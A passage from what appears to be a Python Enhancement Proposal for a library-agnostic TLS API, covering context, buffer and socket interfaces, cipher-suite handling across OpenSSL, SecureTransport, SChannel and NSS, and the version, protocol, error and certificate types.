validate_certificates, certificate_chain, ciphers,
inner_protocols, lowest_supported_version,
highest_supported_version, trust_store, sni_callback
)
Context
We define two Context abstract base classes. These ABCs define objects that
allow configuration of TLS to be applied to specific connections. They can be
thought of as factories for TLSWrappedSocket and TLSWrappedBuffer
objects.
Unlike the current ssl module, we provide two context classes instead of
one. Specifically, we provide the ClientContext and ServerContext
classes. This simplifies the APIs (for example, there is no sense in the server
providing the server_hostname parameter to ssl.SSLContext.wrap_socket,
but because there is only one context class that parameter is still available),
and ensures that implementations know as early as possible which side of a TLS
connection they will serve. Additionally, it allows implementations to opt-out
of one or either side of the connection. For example, SecureTransport on macOS
is not really intended for server use and has an enormous amount of
functionality missing for server-side use. This would allow SecureTransport
implementations to simply not define a concrete subclass of ServerContext
to signal their lack of support.
One of the other major differences to the current ssl module is that a
number of flags and options have been removed. Most of these are self-evident,
but it is worth noting that auto_handshake has been removed from
wrap_socket. This was removed because it fundamentally represents an odd
design wart that saves very minimal effort at the cost of a complexity increase
both for users and implementers. This PEP requires that all users call
do_handshake explicitly after connecting.
As much as possible implementers should aim to make these classes immutable:
that is, they should prefer not to allow users to mutate their internal state
directly, instead preferring to create new contexts from new TLSConfiguration
objects. Obviously, the ABCs cannot enforce this constraint, and so they do not
attempt to.
The Context abstract base class has the following class definition:
TLSBufferObject = Union[TLSWrappedSocket, TLSWrappedBuffer]
class _BaseContext(metaclass=ABCMeta):
@abstractmethod
def __init__(self, configuration: TLSConfiguration):
"""
Create a new context object from a given TLS configuration.
"""
@property
@abstractmethod
def configuration(self) -> TLSConfiguration:
"""
Returns the TLS configuration that was used to create the context.
"""
class ClientContext(_BaseContext):
def wrap_socket(self,
socket: socket.socket,
server_hostname: Optional[str]) -> TLSWrappedSocket:
"""
Wrap an existing Python socket object ``socket`` and return a
``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
socket: all other socket types are unsupported.
The returned SSL socket is tied to the context, its settings and
certificates. The socket object originally passed to this method
should not be used again: attempting to use it in any way will lead
to undefined behaviour, especially across different TLS
implementations. To get the original socket object back once it has
been wrapped in TLS, see the ``unwrap`` method of the
TLSWrappedSocket.
The parameter ``server_hostname`` specifies the hostname of the
service which we are connecting to. This allows a single server to
host multiple SSL-based services with distinct certificates, quite
similarly to HTTP virtual hosts. This is also used to validate the
TLS certificate for the given hostname. If hostname validation is
not desired, then pass ``None`` for this parameter. This parameter
has no default value because opting-out of hostname validation is
dangerous, and should not be the default behaviour.
"""
buffer = self.wrap_buffers(server_hostname)
return TLSWrappedSocket(socket, buffer)
@abstractmethod
def wrap_buffers(self, server_hostname: Optional[str]) -> TLSWrappedBuffer:
"""
Create an in-memory stream for TLS, using memory buffers to store
incoming and outgoing ciphertext. The TLS routines will read
received TLS data from one buffer, and write TLS data that needs to
be emitted to another buffer.
The implementation details of how this buffering works are up to
the individual TLS implementation. This allows TLS libraries that
have their own specialised support to continue to do so, while
allowing those without to use whatever Python objects they see fit.
The ``server_hostname`` parameter has the same meaning as in
``wrap_socket``.
"""
class ServerContext(_BaseContext):
def wrap_socket(self, socket: socket.socket) -> TLSWrappedSocket:
"""
Wrap an existing Python socket object ``socket`` and return a
``TLSWrappedSocket`` object. ``socket`` must be a ``SOCK_STREAM``
socket: all other socket types are unsupported.
The returned SSL socket is tied to the context, its settings and
certificates. The socket object originally passed to this method
should not be used again: attempting to use it in any way will lead
to undefined behaviour, especially across different TLS
implementations. To get the original socket object back once it has
been wrapped in TLS, see the ``unwrap`` method of the
TLSWrappedSocket.
"""
buffer = self.wrap_buffers()
return TLSWrappedSocket(socket, buffer)
@abstractmethod
def wrap_buffers(self) -> TLSWrappedBuffer:
"""
Create an in-memory stream for TLS, using memory buffers to store
incoming and outgoing ciphertext. The TLS routines will read
received TLS data from one buffer, and write TLS data that needs to
be emitted to another buffer.
The implementation details of how this buffering works are up to
the individual TLS implementation. This allows TLS libraries that
have their own specialised support to continue to do so, while
allowing those without to use whatever Python objects they see fit.
"""
Buffer
The buffer-wrapper ABC will be defined by the TLSWrappedBuffer ABC, which
has the following definition:
class TLSWrappedBuffer(metaclass=ABCMeta):
@abstractmethod
def read(self, amt: int) -> bytes:
"""
Read up to ``amt`` bytes of data from the input buffer and return
the result as a ``bytes`` instance.
Once EOF is reached, all further calls to this method return the
empty byte string ``b''``.
May read "short": that is, fewer bytes may be returned than were
requested.
Raise ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read.
May raise ``RaggedEOF`` if the connection has been closed without a
graceful TLS shutdown. Whether this is an exception that should be
ignored or not is up to the specific application.
As at any time a re-negotiation is possible, a call to ``read()``
can also cause write operations.
"""
@abstractmethod
def readinto(self, buffer: Any, amt: int) -> int:
"""
Read up to ``amt`` bytes of data from the input buffer into
``buffer``, which must be an object that implements the buffer
protocol. Returns the number of bytes read.
Once EOF is reached, all further calls to this method return the
empty byte string ``b''``.
Raises ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read.
May read "short": that is, fewer bytes may be read than were
requested.
May raise ``RaggedEOF`` if the connection has been closed without a
graceful TLS shutdown. Whether this is an exception that should be
ignored or not is up to the specific application.
As at any time a re-negotiation is possible, a call to
``readinto()`` can also cause write operations.
"""
@abstractmethod
def write(self, buf: Any) -> int:
"""
Write ``buf`` in encrypted form to the output buffer and return the
number of bytes written. The ``buf`` argument must be an object
supporting the buffer interface.
Raise ``WantReadError`` or ``WantWriteError`` if there is
insufficient data in either the input or output buffer and the
operation would have caused data to be written or read. In either
case, users should endeavour to resolve that situation and then
re-call this method. When re-calling this method users *should*
re-use the exact same ``buf`` object, as some backends require that
the exact same buffer be used.
This operation may write "short": that is, fewer bytes may be
written than were in the buffer.
As at any time a re-negotiation is possible, a call to ``write()``
can also cause read operations.
"""
@abstractmethod
def do_handshake(self) -> None:
"""
Performs the TLS handshake. Also performs certificate validation
and hostname verification.
"""
@abstractmethod
def cipher(self) -> Optional[Union[CipherSuite, int]]:
"""
Returns the CipherSuite entry for the cipher that has been
negotiated on the connection. If no connection has been negotiated,
returns ``None``. If the cipher negotiated is not defined in
CipherSuite, returns the 16-bit integer representing that cipher
directly.
"""
@abstractmethod
def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
"""
Returns the protocol that was selected during the TLS handshake.
This selection may have been made using ALPN, NPN, or some future
negotiation mechanism.
If the negotiated protocol is one of the protocols defined in the
``NextProtocol`` enum, the value from that enum will be returned.
Otherwise, the raw bytestring of the negotiated protocol will be
returned.
If ``Context.set_inner_protocols()`` was not called, if the other
party does not support protocol negotiation, if this socket does
not support any of the peer's proposed protocols, or if the
handshake has not happened yet, ``None`` is returned.
"""
@property
@abstractmethod
def context(self) -> Context:
"""
The ``Context`` object this buffer is tied to.
"""
@abstractproperty
def negotiated_tls_version(self) -> Optional[TLSVersion]:
"""
The version of TLS that has been negotiated on this connection.
"""
@abstractmethod
def shutdown(self) -> None:
"""
Performs a clean TLS shut down. This should generally be used
whenever possible to signal to the remote peer that the content is
finished.
"""
@abstractmethod
def receive_from_network(self, data):
"""
Receives some TLS data from the network and stores it in an
internal buffer.
"""
@abstractmethod
def peek_outgoing(self, amt):
"""
Returns the next ``amt`` bytes of data that should be written to
the network from the outgoing data buffer, without removing it from
the internal buffer.
"""
@abstractmethod
def consume_outgoing(self, amt):
"""
Discard the next ``amt`` bytes from the outgoing data buffer. This
should be used when ``amt`` bytes have been sent on the network, to
signal that the data no longer needs to be buffered.
"""
Socket
The socket-wrapper class will be a concrete class that accepts two items in its
constructor: a regular socket object, and a TLSWrappedBuffer object. This
object will be too large to recreate in this PEP, but will be submitted as part
of the work to build the module.
The wrapped socket will implement all of the socket API, though it will have
stub implementations of methods that only work for sockets with types other
than SOCK_STREAM (e.g. sendto/recvfrom). That limitation can be
lifted as-and-when support for DTLS is added to this module.
In addition, the socket class will include the following extra methods on top
of the regular socket methods:
class TLSWrappedSocket:
def do_handshake(self) -> None:
"""
Performs the TLS handshake. Also performs certificate validation
and hostname verification. This must be called after the socket has
connected (either via ``connect`` or ``accept``), before any other
operation is performed on the socket.
"""
def cipher(self) -> Optional[Union[CipherSuite, int]]:
"""
Returns the CipherSuite entry for the cipher that has been
negotiated on the connection. If no connection has been negotiated,
returns ``None``. If the cipher negotiated is not defined in
CipherSuite, returns the 16-bit integer representing that cipher
directly.
"""
def negotiated_protocol(self) -> Optional[Union[NextProtocol, bytes]]:
"""
Returns the protocol that was selected during the TLS handshake.
This selection may have been made using ALPN, NPN, or some future
negotiation mechanism.
If the negotiated protocol is one of the protocols defined in the
``NextProtocol`` enum, the value from that enum will be returned.
Otherwise, the raw bytestring of the negotiated protocol will be
returned.
If ``Context.set_inner_protocols()`` was not called, if the other
party does not support protocol negotiation, if this socket does
not support any of the peer's proposed protocols, or if the
handshake has not happened yet, ``None`` is returned.
"""
@property
def context(self) -> Context:
"""
The ``Context`` object this socket is tied to.
"""
def negotiated_tls_version(self) -> Optional[TLSVersion]:
"""
The version of TLS that has been negotiated on this connection.
"""
def unwrap(self) -> socket.socket:
"""
Cleanly terminate the TLS connection on this wrapped socket. Once
called, this ``TLSWrappedSocket`` can no longer be used to transmit
data. Returns the socket that was wrapped with TLS.
"""
Cipher Suites
Supporting cipher suites in a truly library-agnostic fashion is a remarkably
difficult undertaking. Different TLS implementations often have radically
different APIs for specifying cipher suites, but more problematically these
APIs frequently differ in capability as well as in style. Some examples are
shown below:
OpenSSL
OpenSSL uses a well-known cipher string format. This format has been adopted as
a configuration language by most products that use OpenSSL, including Python.
This format is relatively easy to read, but has a number of downsides: it is
a string, which makes it remarkably easy to provide bad inputs; it lacks much
detailed validation, meaning that it is possible to configure OpenSSL in a way
that doesn’t allow it to negotiate any cipher at all; and it allows specifying
cipher suites in a number of different ways that make it tricky to parse. The
biggest problem with this format is that there is no formal specification for
it, meaning that the only way to parse a given string the way OpenSSL would is
to get OpenSSL to parse it.
OpenSSL’s cipher strings can look like this:
'ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5'
This string demonstrates some of the complexity of the OpenSSL format. For
example, it is possible for one entry to specify multiple cipher suites: the
entry ECDH+AESGCM means “all ciphers suites that include both
elliptic-curve Diffie-Hellman key exchange and AES in Galois Counter Mode”.
More explicitly, that will expand to four cipher suites:
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
That makes parsing a complete OpenSSL cipher string extremely tricky. Add to
the fact that there are other meta-characters, such as “!” (exclude all cipher
suites that match this criterion, even if they would otherwise be included:
“!MD5” means that no cipher suites using the MD5 hash algorithm should be
included), “-” (exclude matching ciphers if they were already included, but
allow them to be re-added later if they get included again), and “+” (include
the matching ciphers, but place them at the end of the list), and you get an
extremely complex format to parse. On top of this complexity it should be
noted that the actual result depends on the OpenSSL version, as an OpenSSL
cipher string is valid so long as it contains at least one cipher that OpenSSL
recognises.
OpenSSL also uses different names for its ciphers than the names used in the
relevant specifications. See the manual page for ciphers(1) for more
details.
The actual API inside OpenSSL for the cipher string is simple:
char *cipher_list = <some cipher list>;
int rc = SSL_CTX_set_cipher_list(context, cipher_list);
This means that any format that is used by this module must be able to be
converted to an OpenSSL cipher string for use with OpenSSL.
SecureTransport
SecureTransport is the macOS system TLS library. This library is substantially
more restricted than OpenSSL in many ways, as it has a much more restricted
class of users. One of these substantial restrictions is in controlling
supported cipher suites.
Ciphers in SecureTransport are represented by a C enum. This enum has one
entry per cipher suite, with no aggregate entries, meaning that it is not
possible to reproduce the meaning of an OpenSSL cipher string like
“ECDH+AESGCM” without hand-coding which categories each enum member falls into.
However, the names of most of the enum members are in line with the formal
names of the cipher suites: that is, the cipher suite that OpenSSL calls
“ECDHE-ECDSA-AES256-GCM-SHA384” is called
“TLS_ECDHE_ECDHSA_WITH_AES_256_GCM_SHA384” in SecureTransport.
The API for configuring cipher suites inside SecureTransport is simple:
SSLCipherSuite ciphers[] = {TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ...};
OSStatus status = SSLSetEnabledCiphers(context, ciphers, sizeof(ciphers));
SChannel
SChannel is the Windows system TLS library.
SChannel has extremely restrictive support for controlling available TLS
cipher suites, and additionally adopts a third method of expressing what TLS
cipher suites are supported.
Specifically, SChannel defines a set of ALG_ID constants (C unsigned ints).
Each of these constants does not refer to an entire cipher suite, but instead
an individual algorithm. Some examples are CALG_3DES and CALG_AES_256,
which refer to the bulk encryption algorithm used in a cipher suite,
CALG_DH_EPHEM and CALG_RSA_KEYX which refer to part of the key exchange
algorithm used in a cipher suite, CALG_SHA1 and CALG_MD5 which refer to
the message authentication code used in a cipher suite, and CALG_ECDSA and
CALG_RSA_SIGN which refer to the signing portions of the key exchange
algorithm.
This can be thought of as the half of OpenSSL’s functionality that
SecureTransport doesn’t have: SecureTransport only allows specifying exact
cipher suites, while SChannel only allows specifying parts of the cipher
suite, while OpenSSL allows both.
Determining which cipher suites are allowed on a given connection is done by
providing a pointer to an array of these ALG_ID constants. This means that
any suitable API must allow the Python code to determine which ALG_ID
constants must be provided.
Network Security Services (NSS)
NSS is Mozilla’s crypto and TLS library. It’s used in Firefox, Thunderbird,
and as alternative to OpenSSL in multiple libraries, e.g. curl.
By default, NSS comes with secure configuration of allowed ciphers. On some
platforms such as Fedora, the list of enabled ciphers is globally configured
in a system policy. Generally, applications should not modify cipher suites
unless they have specific reasons to do so.
NSS has both process global and per-connection settings for cipher suites. It
does not have a concept of SSLContext like OpenSSL. A SSLContext-like behavior
can be easily emulated. Specifically, ciphers can be enabled or disabled
globally with SSL_CipherPrefSetDefault(PRInt32 cipher, PRBool enabled),
and SSL_CipherPrefSet(PRFileDesc *fd, PRInt32 cipher, PRBool enabled)
for a connection. The cipher PRInt32 number is a signed 32bit integer
that directly corresponds to an registered IANA id, e.g. 0x1301
is TLS_AES_128_GCM_SHA256. Contrary to OpenSSL, the preference order
of ciphers is fixed and cannot be modified at runtime.
Like SecureTransport, NSS has no API for aggregated entries. Some consumers
of NSS have implemented custom mappings from OpenSSL cipher names and rules
to NSS ciphers, e.g. mod_nss.
Proposed Interface
The proposed interface for the new module is influenced by the combined set of
limitations of the above implementations. Specifically, as every implementation
except OpenSSL requires that each individual cipher be provided, there is no
option but to provide that lowest-common denominator approach.
The simplest approach is to provide an enumerated type that includes a large
subset of the cipher suites defined for TLS. The values of the enum members
will be their two-octet cipher identifier as used in the TLS handshake,
stored as a 16 bit integer. The names of the enum members will be their
IANA-registered cipher suite names.
As of now, the IANA cipher suite registry contains over 320 cipher suites.
A large portion of the cipher suites are irrelevant for TLS connections to
network services. Other suites specify deprecated and insecure algorithms
that are no longer provided by recent versions of implementations. The enum
does not contain ciphers with:
key exchange: NULL, Kerberos (KRB5), pre-shared key (PSK), secure remote
transport (TLS-SRP)
authentication: NULL, anonymous, export grade, Kerberos (KRB5),
pre-shared key (PSK), secure remote transport (TLS-SRP), DSA cert (DSS)
encryption: NULL, ARIA, DES, RC2, export grade 40bit
PRF: MD5
SCSV cipher suites
3DES, RC4, SEED, and IDEA are included for legacy applications. Further more
five additional cipher suites from the TLS 1.3 draft (draft-ietf-tls-tls13-18)
are included, too. TLS 1.3 does not share any cipher suites with TLS 1.2 and
earlier. The resulting enum will contain roughly 110 suites.
Because of these limitations, and because the enum doesn’t contain every
defined cipher, and also to allow for forward-looking applications, all parts
of this API that accept CipherSuite objects will also accept raw 16-bit
integers directly.
Rather than populate this enum by hand, we have a TLS enum script that
builds it from Christian Heimes’ tlsdb JSON file (warning:
large file) and IANA cipher suite registry. The TLSDB also opens up the
possibility of extending the API with additional querying function,
such as determining which TLS versions support which ciphers, if that
functionality is found to be useful or necessary.
If users find this approach to be onerous, a future extension to this API can
provide helpers that can reintroduce OpenSSL’s aggregation functionality.
class CipherSuite(IntEnum):
TLS_RSA_WITH_RC4_128_SHA = 0x0005
TLS_RSA_WITH_IDEA_CBC_SHA = 0x0007
TLS_RSA_WITH_3DES_EDE_CBC_SHA = 0x000a
TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA = 0x0010
TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA = 0x0016
TLS_RSA_WITH_AES_128_CBC_SHA = 0x002f
TLS_DH_RSA_WITH_AES_128_CBC_SHA = 0x0031
TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033
TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035
TLS_DH_RSA_WITH_AES_256_CBC_SHA = 0x0037
TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039
TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003c
TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003d
TLS_DH_RSA_WITH_AES_128_CBC_SHA256 = 0x003f
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0041
TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0043
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA = 0x0045
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067
TLS_DH_RSA_WITH_AES_256_CBC_SHA256 = 0x0069
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006b
TLS_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0084
TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0086
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA = 0x0088
TLS_RSA_WITH_SEED_CBC_SHA = 0x0096
TLS_DH_RSA_WITH_SEED_CBC_SHA = 0x0098
TLS_DHE_RSA_WITH_SEED_CBC_SHA = 0x009a
TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009c
TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009d
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009e
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009f
TLS_DH_RSA_WITH_AES_128_GCM_SHA256 = 0x00a0
TLS_DH_RSA_WITH_AES_256_GCM_SHA384 = 0x00a1
TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00ba
TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00bc
TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0x00be
TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c0
TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c2
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 = 0x00c4
TLS_AES_128_GCM_SHA256 = 0x1301
TLS_AES_256_GCM_SHA384 = 0x1302
TLS_CHACHA20_POLY1305_SHA256 = 0x1303
TLS_AES_128_CCM_SHA256 = 0x1304
TLS_AES_128_CCM_8_SHA256 = 0x1305
TLS_ECDH_ECDSA_WITH_RC4_128_SHA = 0xc002
TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc003
TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA = 0xc004
TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA = 0xc005
TLS_ECDHE_ECDSA_WITH_RC4_128_SHA = 0xc007
TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA = 0xc008
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xc009
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xc00a
TLS_ECDH_RSA_WITH_RC4_128_SHA = 0xc00c
TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA = 0xc00d
TLS_ECDH_RSA_WITH_AES_128_CBC_SHA = 0xc00e
TLS_ECDH_RSA_WITH_AES_256_CBC_SHA = 0xc00f
TLS_ECDHE_RSA_WITH_RC4_128_SHA = 0xc011
TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA = 0xc012
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xc013
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xc014
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc023
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc024
TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 = 0xc025
TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 = 0xc026
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xc027
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xc028
TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 = 0xc029
TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 = 0xc02a
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02b
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02c
TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 = 0xc02d
TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 = 0xc02e
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xc02f
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xc030
TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 = 0xc031
TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 = 0xc032
TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc072
TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc073
TLS_ECDH_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc074
TLS_ECDH_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc075
TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc076
TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc077
TLS_ECDH_RSA_WITH_CAMELLIA_128_CBC_SHA256 = 0xc078
TLS_ECDH_RSA_WITH_CAMELLIA_256_CBC_SHA384 = 0xc079
TLS_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07a
TLS_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07b
TLS_DHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07c
TLS_DHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07d
TLS_DH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc07e
TLS_DH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc07f
TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc086
TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc087
TLS_ECDH_ECDSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc088
TLS_ECDH_ECDSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc089
TLS_ECDHE_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08a
TLS_ECDHE_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08b
TLS_ECDH_RSA_WITH_CAMELLIA_128_GCM_SHA256 = 0xc08c
TLS_ECDH_RSA_WITH_CAMELLIA_256_GCM_SHA384 = 0xc08d
TLS_RSA_WITH_AES_128_CCM = 0xc09c
TLS_RSA_WITH_AES_256_CCM = 0xc09d
TLS_DHE_RSA_WITH_AES_128_CCM = 0xc09e
TLS_DHE_RSA_WITH_AES_256_CCM = 0xc09f
TLS_RSA_WITH_AES_128_CCM_8 = 0xc0a0
TLS_RSA_WITH_AES_256_CCM_8 = 0xc0a1
TLS_DHE_RSA_WITH_AES_128_CCM_8 = 0xc0a2
TLS_DHE_RSA_WITH_AES_256_CCM_8 = 0xc0a3
TLS_ECDHE_ECDSA_WITH_AES_128_CCM = 0xc0ac
TLS_ECDHE_ECDSA_WITH_AES_256_CCM = 0xc0ad
TLS_ECDHE_ECDSA_WITH_AES_128_CCM_8 = 0xc0ae
TLS_ECDHE_ECDSA_WITH_AES_256_CCM_8 = 0xc0af
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca8
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xcca9
TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xccaa
Enum members can be mapped to OpenSSL cipher names:
>>> import ssl
>>> ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
>>> ctx.set_ciphers('ALL:COMPLEMENTOFALL')
>>> ciphers = {c['id'] & 0xffff: c['name'] for c in ctx.get_ciphers()}
>>> ciphers[CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]
'ECDHE-RSA-AES128-GCM-SHA256'
For SecureTransport, these enum members directly refer to the values of the
cipher suite constants. For example, SecureTransport defines the cipher suite
enum member TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 as having the value
0xC02C. Not coincidentally, that is identical to its value in the above
enum. This makes mapping between SecureTransport and the above enum very easy
indeed.
For SChannel there is no easy direct mapping, due to the fact that SChannel
configures ciphers, instead of cipher suites. This represents an ongoing
concern with SChannel, which is that it is very difficult to configure in a
specific manner compared to other TLS implementations.
For the purposes of this PEP, any SChannel implementation will need to
determine which ciphers to choose based on the enum members. This may be more
open than the actual cipher suite list actually wants to allow, or it may be
more restrictive, depending on the choices of the implementation. This PEP
recommends that it be more restrictive, but of course this cannot be enforced.
Protocol Negotiation
Both NPN and ALPN allow for protocol negotiation as part of the HTTP/2
handshake. While NPN and ALPN are, at their fundamental level, built on top of
bytestrings, string-based APIs are frequently problematic as they allow for
errors in typing that can be hard to detect.
For this reason, this module would define a type that protocol negotiation
implementations can pass and be passed. This type would wrap a bytestring to
allow for aliases for well-known protocols. This allows us to avoid the
problems inherent in typos for well-known protocols, while allowing the full
extensibility of the protocol negotiation layer if needed by letting users pass
byte strings directly.
class NextProtocol(Enum):
H2 = b'h2'
H2C = b'h2c'
HTTP1 = b'http/1.1'
WEBRTC = b'webrtc'
C_WEBRTC = b'c-webrtc'
FTP = b'ftp'
STUN = b'stun.nat-discovery'
TURN = b'stun.turn'
TLS Versions
It is often useful to be able to restrict the versions of TLS you’re willing to
support. There are many security advantages in refusing to use old versions of
TLS, and some misbehaving servers will mishandle TLS clients advertising
support for newer versions.
The following enumerated type can be used to gate TLS versions. Forward-looking
applications should almost never set a maximum TLS version unless they
absolutely must, as a TLS backend that is newer than the Python that uses it
may support TLS versions that are not in this enumerated type.
Additionally, this enumerated type defines two additional flags that can always
be used to request either the lowest or highest TLS version supported by an
implementation.
class TLSVersion(Enum):
MINIMUM_SUPPORTED = auto()
SSLv2 = auto()
SSLv3 = auto()
TLSv1 = auto()
TLSv1_1 = auto()
TLSv1_2 = auto()
TLSv1_3 = auto()
MAXIMUM_SUPPORTED = auto()
Errors
This module would define four base classes for use with error handling. Unlike
many of the other classes defined here, these classes are not abstract, as
they have no behaviour. They exist simply to signal certain common behaviours.
Backends should subclass these exceptions in their own packages, but needn’t
define any behaviour for them.
In general, concrete implementations should subclass these exceptions rather
than throw them directly. This makes it moderately easier to determine which
concrete TLS implementation is in use during debugging of unexpected errors.
However, this is not mandatory.
The definitions of the errors are below:
class TLSError(Exception):
"""
The base exception for all TLS related errors from any backend.
Catching this error should be sufficient to catch *all* TLS errors,
regardless of what backend is used.
"""
class WantWriteError(TLSError):
"""
A special signaling exception used only when non-blocking or
buffer-only I/O is used. This error signals that the requested
operation cannot complete until more data is written to the network,
or until the output buffer is drained.
This error is should only be raised when it is completely impossible
to write any data. If a partial write is achievable then this should
not be raised.
"""
class WantReadError(TLSError):
"""
A special signaling exception used only when non-blocking or
buffer-only I/O is used. This error signals that the requested
operation cannot complete until more data is read from the network, or
until more data is available in the input buffer.
This error should only be raised when it is completely impossible to
write any data. If a partial write is achievable then this should not
be raised.
"""
class RaggedEOF(TLSError):
"""
A special signaling exception used when a TLS connection has been
closed gracelessly: that is, when a TLS CloseNotify was not received
from the peer before the underlying TCP socket reached EOF. This is a
so-called "ragged EOF".
This exception is not guaranteed to be raised in the face of a ragged
EOF: some implementations may not be able to detect or report the
ragged EOF.
This exception is not always a problem. Ragged EOFs are a concern only
when protocols are vulnerable to length truncation attacks. Any
protocol that can detect length truncation attacks at the application
layer (e.g. HTTP/1.1 and HTTP/2) is not vulnerable to this kind of
attack and so can ignore this exception.
"""
Certificates
This module would define an abstract X509 certificate class. This class would
have almost no behaviour, as the goal of this module is not to provide all
possible relevant cryptographic functionality that could be provided by X509
certificates. Instead, all we need is the ability to signal the source of a
certificate to a concrete implementation.
For that reason, this certificate implementation defines only constructors. In
essence, the certificate object in this module could be as abstract as a handle
that can be used to locate a specific certificate.
Concrete implementations may choose to provide alternative constructors, e.g.
to load certificates from HSMs. If a common interface emerges for doing this,
this module may be updated to provide a standard constructor for this use-case
as well.
Concrete implementations should aim to have Certificate objects be hashable if
at all possible. This will help ensure that TLSConfiguration objects used with
an individual concrete implementation are also hashable.
class Certificate(metaclass=ABCMeta):
@abstractclassmethod
def from_buffer(cls, buffer: bytes):
"""
Creates a Certificate object from a byte buffer. This byte buffer
may be either PEM-encoded or DER-encoded. If the buffer is PEM
encoded it *must* begin with the standard PEM preamble (a series of
dashes followed by the ASCII bytes "BEGIN CERTIFICATE" and another
series of dashes). In the absence of that preamble, the
implementation may assume that the certificate is DER-encoded
instead.
"""
@abstractclassmethod
def from_file(cls, path: Union[pathlib.Path, AnyStr]):
"""
Creates a Certificate object from a file on disk. This method may
